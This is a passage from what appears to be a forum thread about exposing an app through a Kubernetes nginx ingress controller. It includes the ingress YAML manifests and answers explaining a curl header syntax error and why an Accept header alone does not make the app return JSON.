  server-name-hash-bucket-size: "128"
kind: ConfigMap
metadata:
  name: nginx-load-balancer-conf
  labels:
    app: nginx-ingress-lb
daemonset:
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: nginx-ingress-lb
  labels:
    app: nginx-ingress-lb
spec:
  template:
    metadata:
      labels:
        name: nginx-ingress-lb
        app: nginx-ingress-lb
    spec:
      terminationGracePeriodSeconds: 60
      nodeSelector:
        NodeType: worker
      containers:
      - image: gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.1
        name: nginx-ingress-lb
        imagePullPolicy: Always
        readinessProbe:
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
        livenessProbe:
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          timeoutSeconds: 1
        # use downward API
        env:
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 80
          hostPort: 80
        - containerPort: 443
          hostPort: 443
        args:
        - /nginx-ingress-controller
        - --default-backend-service=$(POD_NAMESPACE)/default-http-backend
        - --configmap=$(POD_NAMESPACE)/nginx-load-balancer-conf
deployment:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: default-http-backend
  labels:
    app: default-http-backend
spec:
  replicas: 2
  template:
    metadata:
      labels:
        app: default-http-backend
    spec:
      terminationGracePeriodSeconds: 60
      containers:
      - name: default-http-backend
        # Any image is permissible as long as:
        # 1. It serves a 404 page at /
        # 2. It serves 200 on a /healthz endpoint
        image: gcr.io/google_containers/defaultbackend:1.2
        livenessProbe:
          httpGet:
            path: /healthz
            port: 8080
            scheme: HTTP
          initialDelaySeconds: 30
          timeoutSeconds: 5
        ports:
        - containerPort: 8080
        resources:
          limits:
            cpu: 100m
            memory: 20Mi
          requests:
            cpu: 100m
            memory: 20Mi
service:
apiVersion: v1
kind: Service
metadata:
  name: default-http-backend
  labels:
    app: default-http-backend
spec:
  selector:
    app: default-http-backend
  ports:
  - port: 80
    targetPort: 8080
Remove the space after the colon in curl -v <url> -H 'Accept: application/json'.
The error message Could not resolve host: application means curl is treating application/json as the URL instead of as part of the header.
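Following that suggestion, the request would look like this (a sketch; <url> remains a placeholder for your actual endpoint):
curl -v <url> -H 'Accept:application/json'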
There are two things:
Exposing your app
Making your app return json
The ingress is only relevant for exposing your app. And it is not the only option: you can use a Service (type LoadBalancer, for example) to achieve that too on most cloud providers. So I'd keep it simple and not use an ingress for now, until you solve the second problem.
As it has been explained, your curl has a syntax problem and that's why it shows curl: (6) Could not resolve host: application.
The other thing is that fixing that won't make your app return JSON, because with that header you are only saying you accept JSON. If you want your app to return JSON, you need to implement it in the app itself; nginx can't guess how you want to map your HTML to JSON. There is really no other way than writing it, at least that I know of :-/
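For the exposure part, here is a minimal sketch of the Service-of-type-LoadBalancer alternative mentioned above; the my-json-app name, label, and port 8080 are hypothetical placeholders for your app:
apiVersion: v1
kind: Service
metadata:
  name: my-json-app        # hypothetical name, for illustration only
spec:
  type: LoadBalancer       # the cloud provider provisions an external IP/load balancer
  selector:
    app: my-json-app       # hypothetical label; must match your app's pods
  ports:
  - port: 80               # port exposed on the load balancer
    targetPort: 8080       # assumed container port of your app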
